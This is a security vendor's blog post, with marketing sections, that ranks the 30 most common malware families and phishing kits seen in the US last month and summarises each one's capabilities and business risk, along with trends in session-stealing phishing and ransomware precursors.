<p class="wp-block-paragraph"><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> lets analysts detonate suspicious files, links, and phishing pages in a live, controllable Windows or Linux environment and interact with the sample in real time — clicking through a device-code prompt, entering credentials into a decoy page, or letting a loader unpack its next stage. </p>



<p class="wp-block-paragraph">For threats like Kali365 and EvilTokens, which hide their real payload behind browser-side JavaScript that only executes after the page renders, this <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/">in-browser visibility</a> is often the only way to see the actual attack flow rather than a static, incomplete one. Every session automatically surfaces network indicators, a MITRE ATT&amp;CK-mapped process tree, and a shareable report — cutting analysis time from hours to minutes. </p>



<p class="wp-block-paragraph">Once a threat is confirmed, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> lets teams pivot instantly from a single indicator — a hash, domain, IP, or even a YARA/Sigma rule — to the full universe of related sandbox sessions, infrastructure, and campaign context drawn from millions of public and private analyses.  </p>



<p class="wp-block-paragraph">For teams that want threats blocked before they reach an inbox or endpoint, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> deliver continuously updated, high-confidence IOCs — IPs, domains, URLs — for actively tracked families like the ones below, in STIX/TAXII, CSV, or JSON formats that plug directly into SIEMs, firewalls, EDR, and SOAR platforms.  </p>



<p class="wp-block-paragraph">Together, these three capabilities cover the full loop: spot what&#8217;s trending with MTT, understand exactly how it works with Interactive Sandbox, and get ahead of it with TI Lookup and TI Feeds.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Don&#8217;t wait for these threats to reach your network.</span><br>
Analyze and detect them with ANY.RUN.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktoenterprise/#contact-sales" rel="noopener" target="_blank">
Contact sales</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Top 30 Threats in the US: Last Month&#8217;s Data&nbsp;</h2>



<h3 class="wp-block-heading">1. Sneaky 2FA&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/sneaky2fa/" target="_blank" rel="noreferrer noopener">Sneaky 2FA</a> is a phishing-as-a-service (PhaaS) kit that runs adversary-in-the-middle (AiTM) attacks against Microsoft 365 accounts, relaying real login traffic through a reverse proxy to capture credentials and session cookies in real time. It primarily targets any organization running Microsoft 365, with no particular industry spared.  </p>



<p class="wp-block-paragraph">The kit is most notable for auto-filling the victim&#8217;s email address to boost credibility and for anti-bot checks that block security researchers and sandboxes from inspecting its pages. For businesses, it&#8217;s dangerous because it defeats standard MFA outright, handing attackers a live, authenticated session rather than just a stolen password.&nbsp;</p>



<h3 class="wp-block-heading">2. AsyncRAT&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/asyncrat/" target="_blank" rel="noreferrer noopener">AsyncRAT</a> is an open-source remote access trojan (RAT) written in C#, originally published on GitHub as a legitimate remote administration tool before criminals repurposed it. It&#8217;s used indiscriminately across industries because it&#8217;s free, well-documented, and easy for low-skill actors to customize.  </p>



<p class="wp-block-paragraph">AsyncRAT is most notable for its plugin-based architecture supporting keylogging, screen capture, and credential theft, plus its constant presence in phishing and malicious-script delivery chains. It&#8217;s dangerous for businesses because its ubiquity and endless minor variants make signature-based detection unreliable, and it often serves as the first foothold before a bigger compromise.&nbsp;</p>



<h3 class="wp-block-heading">3. EvilTokens&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/eviltokens/" target="_blank" rel="noreferrer noopener">EvilTokens</a> is a phishing-as-a-service platform that abuses Microsoft&#8217;s legitimate OAuth 2.0 device-authorization flow to steal access tokens after a victim completes a real MFA challenge on Microsoft&#8217;s genuine login page — no fake login page, no stolen password. It concentrates heavily on finance, technology, manufacturing, education, and consulting firms running Microsoft 365.  </p>



<p class="wp-block-paragraph">The kit is most notable for hiding its phishing payload inside AES-GCM-encrypted content that only decrypts in the browser, defeating static analysis, and for AI-assisted business email compromise (BEC) tooling built into its affiliate panel. That combination makes it a serious business risk: a single compromised inbox can cascade into fraud, data theft, and lateral movement across connected services.&nbsp;</p>



<h3 class="wp-block-heading">4. EvilProxy&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/evilproxy/" target="_blank" rel="noreferrer noopener">EvilProxy</a> is a long-running adversary-in-the-middle phishing-as-a-service platform that lets affiliates rent turnkey reverse-proxy infrastructure to target Microsoft 365, Google Workspace, GitHub, and other MFA-protected services. It&#8217;s used broadly across finance, SaaS, and enterprise IT environments, wherever cloud account access has resale value to attackers.  </p>



<p class="wp-block-paragraph">EvilProxy is most notable for popularizing the AiTM-as-a-service model years before its successors, effectively lowering the skill floor for MFA-bypass attacks industry-wide. For businesses, the danger is scale: a single subscription-based kit can power thousands of parallel campaigns against different targets simultaneously.&nbsp;</p>



<h3 class="wp-block-heading">5. Kali365&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/kali365/" target="_blank" rel="noreferrer noopener">Kali365</a> is an FBI-flagged phishing-as-a-service platform, first observed in April 2026, that steals Microsoft 365 OAuth tokens by abusing the legitimate device-code authentication flow rather than harvesting passwords. It targets any organization running Microsoft 365, with confirmed campaigns spanning finance, professional services, and general enterprise targets across North America.  </p>



<p class="wp-block-paragraph">The kit is most notable for AI-generated phishing lures localized into 15 languages and for post-compromise automation that silently creates malicious inbox rules to suppress security warnings. It&#8217;s especially dangerous for business because it persists even through password resets — only session and token revocation stops it — and it enables direct fraud through compromised executive and finance mailboxes.&nbsp;</p>



<h3 class="wp-block-heading">6. Vidar&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/vidar/" target="_blank" rel="noreferrer noopener">Vidar</a> is a malware-as-a-service (MaaS) information stealer that harvests browser-stored passwords, cookies, autofill data, cryptocurrency wallets, and two-factor authenticator data from infected machines. It&#8217;s distributed broadly via malvertising and cracked-software downloads, hitting individuals and businesses across every sector without a specific industry focus.  </p>



<p class="wp-block-paragraph">Vidar is most notable for its resilient command-and-control model, using legitimate platforms like Telegram and Steam profiles as dead-drop resolvers to locate its real servers. For businesses, stolen credentials and session cookies from Vidar routinely end up feeding follow-on attacks, including corporate account takeover and access broker sales to ransomware affiliates.&nbsp;</p>



<h3 class="wp-block-heading">7. XWorm&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/xworm/" target="_blank" rel="noreferrer noopener">XWorm</a> is a modular remote access trojan sold on underground forums, giving buyers remote desktop control, keylogging, webcam access, and an optional ransomware module in a single package. It spreads across industries through phishing attachments and loader chains, with no strong sector preference.  </p>



<p class="wp-block-paragraph">XWorm is most notable for its low cost and active developer support, which keeps new builds circulating faster than signatures can keep up. The danger for businesses lies in its versatility — the same infection can pivot from espionage to data theft to on-demand file encryption depending on what the operator decides mid-campaign.&nbsp;</p>



<h3 class="wp-block-heading">8. Stealc&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/stealc/" target="_blank" rel="noreferrer noopener">Stealc</a> is a malware-as-a-service info-stealer modeled closely on Vidar and Raccoon, built to harvest browser credentials, cryptocurrency wallets, and email client data at high volume and low cost to affiliates. It&#8217;s distributed indiscriminately, often bundled with cracked software and fake installers, touching businesses in every vertical whose employees browse from work devices.  </p>



<p class="wp-block-paragraph">Stealc is most notable for rapidly filling the gap left when older stealer services shut down, thanks to aggressive underground marketing and frequent updates. For businesses, the risk is straightforward but severe: any employee credential harvested by Stealc can become the entry point for a much larger corporate breach.&nbsp;</p>



<h3 class="wp-block-heading">9. FlowerStorm&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/flowerstorm/" target="_blank" rel="noreferrer noopener">FlowerStorm</a> is an adversary-in-the-middle phishing kit that emerged to fill the gap left after a major AiTM phishing service was disrupted, and it now runs a similar reverse-proxy model against Microsoft 365 logins. It targets any organization dependent on Microsoft cloud services, with no specific industry exclusions.  </p>



<p class="wp-block-paragraph">FlowerStorm is most notable for demonstrating how quickly the AiTM phishing ecosystem regenerates after takedowns — new kits absorb displaced affiliates within weeks. That resilience is exactly why it&#8217;s dangerous for business: disrupting one phishing-as-a-service operator rarely reduces the total volume of MFA-bypass attacks in the wild for long.&nbsp;&nbsp;</p>



<h3 class="wp-block-heading">10. Emotet&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/emotet/" target="_blank" rel="noreferrer noopener">Emotet</a> began as a banking trojan and evolved into one of the most notorious malware-delivery botnets in history, spreading through malicious Office macros and acting as an initial-access broker for ransomware groups. It has hit organizations across finance, healthcare, government, and virtually every other sector over its long operational history.  </p>



<p class="wp-block-paragraph">Emotet is most notable for surviving multiple law enforcement takedowns and re-emerging each time with updated delivery mechanics. For businesses, its danger isn&#8217;t just the initial infection — it&#8217;s what follows, since Emotet infections have historically preceded costly ransomware deployments from groups like Ryuk and Conti.&nbsp;</p>



<h3 class="wp-block-heading">11. Tycoon 2FA&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/tycoon/" target="_blank" rel="noreferrer noopener">Tycoon 2FA</a> is a phishing-as-a-service platform running adversary-in-the-middle attacks against Microsoft 365 and Gmail accounts, using a reverse proxy to relay real authentication traffic and steal session cookies. It&#8217;s rented broadly by criminal affiliates and used against organizations across virtually every industry with cloud email.  </p>



<p class="wp-block-paragraph">The kit is most notable for its layered anti-detection measures, including Cloudflare Turnstile challenges designed to block security scanners from analyzing its phishing pages. Businesses should treat it as dangerous precisely because it targets the authentication layer itself — once a session cookie is stolen, MFA has already done its job and can&#8217;t stop the takeover.&nbsp;</p>



<h3 class="wp-block-heading">12. Remcos&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/remcos/" target="_blank" rel="noreferrer noopener">Remcos</a> is marketed as a legitimate remote administration tool but is overwhelmingly deployed as a remote access trojan, giving attackers keylogging, screen capture, webcam and microphone access, and full remote control of infected machines. It spreads across industries via phishing email attachments, with no specific sector focus.</p>



<p class="wp-block-paragraph">Remcos is most notable for its long shelf life and commercial-grade polish, since it&#8217;s sold openly rather than traded exclusively on criminal forums. For businesses, its full surveillance capability makes it a serious espionage and data-theft risk, particularly when it lands on machines used by finance or executive staff.</p>



<h3 class="wp-block-heading">13. Agent Tesla</h3>



<ol start="13" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/agenttesla/" target="_blank" rel="noreferrer noopener">Agent Tesla</a> is a .NET-based keylogger, RAT, and information stealer distributed almost entirely through phishing email attachments disguised as invoices, orders, or shipping documents. It targets businesses across manufacturing, logistics, and professional services especially heavily, wherever document-based phishing lures land convincingly.</p>



<p class="wp-block-paragraph">Agent Tesla is most notable for exfiltrating stolen data over unconventional channels like SMTP, FTP, and Telegram bots, making network-based detection harder. The danger for business is its sheer popularity among low-skill actors, which keeps a constant, high-volume stream of Agent Tesla phishing campaigns hitting corporate inboxes.</p>



<h3 class="wp-block-heading">14. DCRat</h3>



<ol start="14" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/dcrat/" target="_blank" rel="noreferrer noopener">DCRat</a> is a modular remote access trojan sold cheaply on underground forums, with a plugin architecture that lets buyers add keylogging, ransomware, or DDoS capability on top of core remote control. It&#8217;s used opportunistically across industries, largely wherever phishing or loader-based delivery succeeds.</p>



<p class="wp-block-paragraph">DCRat is most notable for its unusually low price point, which puts sophisticated RAT capability within reach of nearly any aspiring cybercriminal. For businesses, that accessibility is the real danger — DCRat infections can escalate in unpredictable directions depending on which plugins the operator chooses to load.</p>



<h3 class="wp-block-heading">15. WannaCry</h3>



<ol start="15" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/wannacry/" target="_blank" rel="noreferrer noopener">WannaCry</a> is the ransomware worm that triggered a global outage in 2017 by self-propagating through the EternalBlue SMB vulnerability, encrypting files across entire networks without any user interaction. It disproportionately still resurfaces in healthcare, manufacturing, and other sectors running legacy or unpatched Windows systems.</p>



<p class="wp-block-paragraph">WannaCry is most notable for demonstrating how a single unpatched vulnerability can cause damage at a genuinely global scale within hours. Its continued presence in current sandbox data is a stark business risk indicator: any organization still detonating WannaCry samples almost certainly has unpatched systems exposed to far newer threats as well.</p>



<h3 class="wp-block-heading">16. RedLine</h3>



<ol start="16" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/redline/" target="_blank" rel="noreferrer noopener">RedLine</a> is a malware-as-a-service info-stealer that harvests browser credentials, cryptocurrency wallets, VPN and FTP logins, and system information, sold cheaply to a wide base of criminal affiliates. It spreads through cracked software and malvertising, hitting businesses across every sector with no particular targeting.</p>



<p class="wp-block-paragraph">RedLine is most notable for having been one of the most widely deployed stealers on the market before a major law enforcement disruption in 2024, and for the fact that variants and rebrands are still circulating despite that action. For businesses, RedLine&#8217;s harvested credentials frequently surface later in initial access broker marketplaces, feeding ransomware intrusions well after the original infection.</p>



<h3 class="wp-block-heading">17. DonutLoader</h3>



<ol start="17" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/donutloader/">DonutLoader</a> is an open-source, publicly available in-memory loader that converts executables, DLLs, and .NET assemblies into position-independent shellcode, letting attackers run payloads filelessly inside trusted processes. It&#8217;s used across the board — ransomware crews, APT groups, and commodity malware operators alike — because it&#8217;s free and effective.</p>



<p class="wp-block-paragraph">DonutLoader is most notable for defeating signature-based detection almost entirely by never writing a payload to disk, and it&#8217;s officially tracked under MITRE ATT&amp;CK as S0695. That makes it dangerous for businesses in a very direct way: infections built on DonutLoader can sit undetected for hours or days while EDR tools look for artifacts that simply never touch the disk.</p>



<h3 class="wp-block-heading">18. QuasarRAT</h3>



<ol start="18" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/quasar/" target="_blank" rel="noreferrer noopener">QuasarRAT</a> is an open-source .NET remote access trojan published on GitHub as a legitimate administration tool, now widely repurposed by criminal and state-linked actors alike. It shows up across virtually every industry because its source code is freely available and easy to rebrand.</p>



<p class="wp-block-paragraph">QuasarRAT is most notable for serving as base code for numerous other RAT families and APT toolsets, making it a kind of foundational threat rather than a single standalone one. For businesses, that reuse means a QuasarRAT detection can indicate anything from a low-skill opportunistic attacker to a more targeted intrusion using a modified variant.</p>



<h3 class="wp-block-heading">19. Qbot</h3>



<ol start="19" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/qbot/" target="_blank" rel="noreferrer noopener">Qbot</a> (Qakbot) is a banking trojan and loader with a long history of serving as an initial-access foothold for ransomware groups including Conti and Black Basta. It has hit finance, professional services, and manufacturing organizations particularly hard over the years.</p>



<p class="wp-block-paragraph">Qbot is most notable for surviving a major FBI-led infrastructure takedown in 2023 only to resurface with updated delivery chains months later. The business danger here is what Qbot represents rather than what it does alone — its presence has historically been a leading indicator of an imminent, much more damaging ransomware event.</p>



<h3 class="wp-block-heading">20. Smoke Loader</h3>



<ol start="20" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/smoke/" target="_blank" rel="noreferrer noopener">Smoke Loader</a> is a modular downloader and backdoor that&#8217;s been circulating since 2011, used primarily to deliver second-stage payloads like stealers, banking trojans, and ransomware onto infected machines. It spreads through phishing and exploit kits across a broad range of industries.</p>



<p class="wp-block-paragraph">Smoke Loader is most notable for its longevity and plugin-based flexibility, letting operators swap in new capabilities without rebuilding the core malware. For businesses, its main danger is as a delivery mechanism — a Smoke Loader detection rarely means the attack is over, since the actual damaging payload usually arrives afterward.</p>



<h3 class="wp-block-heading">21. LokiBot</h3>



<ol start="21" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/lokibot/" target="_blank" rel="noreferrer noopener">LokiBot</a> is a commodity information stealer and keylogger that targets browser credentials, email clients, FTP logins, and cryptocurrency wallets, typically delivered via phishing documents exploiting older Office vulnerabilities. It&#8217;s spread broadly across industries with minimal targeting discrimination.</p>



<p class="wp-block-paragraph">LokiBot is most notable for its remarkable staying power despite being a known, well-signatured threat for years, largely due to constant minor code changes that dodge static detection. The business risk is less about sophistication and more about volume: LokiBot&#8217;s sheer prevalence means unpatched systems remain a constant, low-effort target for opportunistic attackers.</p>



<h3 class="wp-block-heading">22. Lumma</h3>



<ol start="22" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/lumma/" target="_blank" rel="noreferrer noopener">Lumma</a> is a subscription-based malware-as-a-service info-stealer that harvests browser credentials, cryptocurrency wallets, and two-factor authentication extension data, and was one of the most dominant stealers on the market before a major 2025 law enforcement and Microsoft-led disruption. It hit businesses across every sector indiscriminately through malvertising and cracked-software lures.</p>



<p class="wp-block-paragraph">Lumma is most notable for spawning Remus Stealer as a direct technical successor after its core infrastructure was disrupted. For businesses, Lumma is a case study in how quickly a disrupted MaaS operation regenerates — the underlying criminal demand didn&#8217;t go away, it just migrated to a new codebase.</p>



<h3 class="wp-block-heading">23. Mirai</h3>



<ol start="23" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/mirai/" target="_blank" rel="noreferrer noopener">Mirai</a> is IoT botnet malware whose source code was leaked publicly in 2016, letting it spawn dozens of variants that infect routers, cameras, and other internet-connected devices using default or weak credentials. It targets any organization with exposed, poorly secured IoT infrastructure rather than a specific industry.</p>



<p class="wp-block-paragraph">Mirai is most notable for powering some of the largest distributed denial-of-service (DDoS) attacks ever recorded. The danger for business is often indirect but severe: Mirai-infected devices on a corporate network can be weaponized against the business&#8217;s own infrastructure or rented out to attack someone else&#8217;s, with the compromised organization caught in the middle.</p>



<h3 class="wp-block-heading">24. NetWire</h3>



<ol start="24" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/netwire/" target="_blank" rel="noreferrer noopener">NetWire</a> is a commercially sold remote access trojan offering keylogging, credential theft, and webcam control across both Windows and Mac systems. It&#8217;s used opportunistically across industries wherever phishing delivery succeeds.</p>



<p class="wp-block-paragraph">NetWire is most notable for having operated semi-openly as a paid product before its alleged operator was arrested in 2023, after which variants continued circulating regardless. For businesses, its cross-platform reach is the key risk factor — NetWire doesn&#8217;t spare Mac-heavy environments the way many commodity RATs do.</p>



<h3 class="wp-block-heading">25. Formbook</h3>



<ol start="25" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/formbook/" target="_blank" rel="noreferrer noopener">Formbook</a> is a cheap, widely available spyware and info-stealer sold as malware-as-a-service, specializing in form-grabbing, keylogging, and credential theft from browsers and email clients. It spreads through phishing campaigns across virtually every industry due to its low cost and ease of use.</p>



<p class="wp-block-paragraph">Formbook is most notable for its long operational history since 2016 and for its macOS-targeting sibling, XLoader, which extended the same capability to Apple environments. The business danger is its accessibility — Formbook puts credential-stealing capability within reach of almost any attacker with a modest budget, keeping infection volume consistently high.</p>



<h3 class="wp-block-heading">26. njRAT</h3>



<ol start="26" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/njrat/" target="_blank" rel="noreferrer noopener">njRAT</a> (also known as Bladabindi) is a remote access trojan with roots in Middle Eastern hacking communities, offering remote desktop control, keylogging, webcam access, and USB-based self-propagation. It spreads across industries with no strong sector preference, largely through cracked software and phishing.</p>



<p class="wp-block-paragraph">njRAT is most notable for its widely available, easy-to-use builder tool, which keeps new variants appearing constantly from low-skill operators. For businesses, that accessibility translates into unpredictable risk — infections range from petty credential theft to more serious espionage depending entirely on who&#8217;s behind the keyboard.</p>



<h3 class="wp-block-heading">27. NanoCore</h3>



<ol start="27" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/nanocore/" target="_blank" rel="noreferrer noopener">NanoCore</a> is a plugin-based remote access trojan offering webcam and microphone control, keylogging, and file management, historically sold as a commercial product before its developer was convicted in the US in 2017. It&#8217;s used opportunistically across industries via phishing delivery.</p>



<p class="wp-block-paragraph">NanoCore is most notable for the sheer number of surveillance-focused plugins available to buyers, making it a particularly invasive RAT even by commodity malware standards. The danger for business lies in that surveillance depth — a NanoCore infection can expose far more than credentials, including live audio and video from compromised machines.</p>



<h3 class="wp-block-heading">28. Gh0st RAT</h3>



<ol start="28" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/gh0st/" target="_blank" rel="noreferrer noopener">Gh0st RAT</a> is a remote access trojan of Chinese origin with a long operational history in state-linked and espionage-focused campaigns, offering full remote control, keylogging, and screen capture. It has been used against government, defense, and technology sector targets specifically, alongside broader opportunistic use.</p>



<p class="wp-block-paragraph">Gh0st RAT is most notable for its persistent association with advanced, targeted intrusions rather than purely commodity cybercrime. For businesses, particularly those in sensitive or regulated sectors, a Gh0st RAT detection warrants treating the incident as a potential targeted intrusion rather than routine opportunistic malware.</p>



<h3 class="wp-block-heading">29. Remus Stealer</h3>



<ol start="29" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/remus/" target="_blank" rel="noreferrer noopener">Remus Stealer</a> is a 64-bit information stealer that emerged in early 2026 as a direct evolutionary successor to Lumma Stealer, built to harvest browser credentials, cookies, authentication tokens, and cryptocurrency wallets. It targets financial services, healthcare, government, technology, and managed service providers in particular.</p>



<p class="wp-block-paragraph">Remus is most notable for using EtherHiding — storing its command-and-control address inside an Ethereum smart contract — to make its infrastructure resistant to takedown, and for stealing active browser session cookies that bypass MFA outright. That session-hijacking capability makes it dangerous for business: it turns a single infected endpoint into a live, authenticated account takeover rather than just a stolen password.</p>



<h3 class="wp-block-heading">30. Cobalt Strike</h3>



<ol start="30" class="wp-block-list"></ol>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/cobaltstrike/" target="_blank" rel="noreferrer noopener">Cobalt Strike</a> is a legitimate red-team and penetration-testing framework whose cracked and leaked versions have become one of the most widely abused command-and-control tools in ransomware and APT operations. It&#8217;s used across every industry, typically in the later stages of an intrusion rather than as an initial infection vector.</p>



<p class="wp-block-paragraph">Cobalt Strike is most notable for its &#8220;beacon&#8221; payload, which enables stealthy lateral movement, privilege escalation, and long-term persistence inside a compromised network. For businesses, seeing Cobalt Strike in an environment is a red flag with real urgency — it frequently signals that attackers already have a foothold and are actively preparing to escalate toward data theft or ransomware deployment.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut your exposure to top threats before they cut into your bottom line.</span><br>
Integrate ANY.RUN&#8217;s threat intelligence solutions
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktoenterprise/#contact-sales" rel="noopener" target="_blank">
Contact sales</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Most Dangerous US Phishing Campaigns in 2026&nbsp;</h2>



<p class="wp-block-paragraph">If one theme defines the 2026 US phishing landscape, it&#8217;s the shift from stealing passwords to stealing sessions. Kali365 and EvilTokens represent the sharpest edge of this trend: both abuse Microsoft&#8217;s legitimate device-code authorization flow, meaning the victim completes a real login on a real Microsoft page, and the attacker walks away with a valid OAuth token instead of a password. Neither kit needs a convincing fake login page, which strips away most of the visual cues employees are trained to spot. The FBI&#8217;s public advisory on Kali365 — and the emergence of at least one related operator panel, ARToken, documented by Cisco Talos — underscores how quickly this technique has scaled into a genuine national security concern rather than a niche curiosity.&nbsp;</p>



<p class="wp-block-paragraph">Running alongside device-code phishing is the older but still thriving adversary-in-the-middle (AiTM) model, represented in this month&#8217;s data by Sneaky 2FA, EvilProxy, Tycoon 2FA, and FlowerStorm. These kits use reverse proxies to sit between the victim and a real login page, capturing the session cookie the instant authentication succeeds. &nbsp;</p>



<p class="wp-block-paragraph">The AiTM market has proven remarkably resilient to takedowns: when one operator is disrupted, affiliates simply migrate to the next kit, as FlowerStorm&#8217;s emergence demonstrated. For business leaders, the practical implication is that phishing-resistant MFA (hardware security keys, not push notifications or one-time codes) and tighter conditional access policies around device-code flows are now baseline requirements, not advanced hardening. &nbsp;</p>



<h2 class="wp-block-heading">Ransomware Attacks Targeting US Companies&nbsp;</h2>



<p class="wp-block-paragraph">Direct ransomware payloads make up a smaller share of this month&#8217;s top 30 than commodity stealers and phishing kits, but the ransomware threat is far from diminished — it&#8217;s simply moved earlier in the attack chain. WannaCry remains a persistent reminder that unpatched, legacy-vulnerable systems are still being found and encrypted years after EternalBlue was first weaponized. &nbsp;</p>



<p class="wp-block-paragraph">More significantly, several of this month&#8217;s top-ranked threats function as the access layer that ransomware operators depend on: Cobalt Strike for post-compromise lateral movement, Qbot and Emotet with their long histories as initial-access brokers for ransomware affiliates, and loaders like DonutLoader and Smoke Loader that quietly stage the next payload without tripping signature-based defenses.&nbsp;</p>



<p class="wp-block-paragraph">This is the pattern US businesses need to internalize: by the time a ransom note appears, the actual compromise usually happened days or weeks earlier, through a phishing kit, a stealer, or a RAT that looked like a routine, low-severity incident at the time. Treating detections of Cobalt Strike beacons, Qbot infections, or session-token theft as early ransomware indicators — not isolated events — is one of the highest-leverage shifts a SOC can make in 2026.&nbsp;</p>



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p class="wp-block-paragraph">This month&#8217;s US data makes one thing clear: the threats businesses face aren&#8217;t a static list to memorize once a year — they&#8217;re a moving target that shifts week to week. Phishing-as-a-service kits are getting better at defeating MFA. Decades-old malware like Emotet and WannaCry haven&#8217;t disappeared. And the line between &#8220;just a stealer infection&#8221; and &#8220;the opening move of a ransomware attack&#8221; keeps getting thinner.&nbsp;</p>



<p class="wp-block-paragraph">Staying ahead of that requires the same thing MTT is built to provide: real, current visibility instead of last year&#8217;s threat report. Combined with the ability to safely detonate and understand a suspicious file or phishing page the moment it appears, and threat intelligence that turns a single indicator into full campaign context, security teams can move from reacting to these 30 threats to genuinely staying ahead of them.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and&nbsp;threat&nbsp;intelligence solutions, helps organizations investigate&nbsp;threats&nbsp;faster&nbsp;and make&nbsp;response decisions based on clear&nbsp;behavioral evidence.&nbsp;</p>



<p class="wp-block-paragraph">Its solutions include the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> for enterprise-scale malware and phishing analysis, along with <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> products built on investigation data from more than 15,000 organizations. This intelligence helps security teams enrich alerts, uncover active threats earlier, and add relevant context to detection, investigation, and response workflows. </p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktocomliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, demonstrating its commitment to strong security controls and customer data protection. For SOCs, MSSPs, and enterprise security teams, the platform helps reduce investigation uncertainty, accelerate triage, and turn threat analysis into actionable findings. </p>
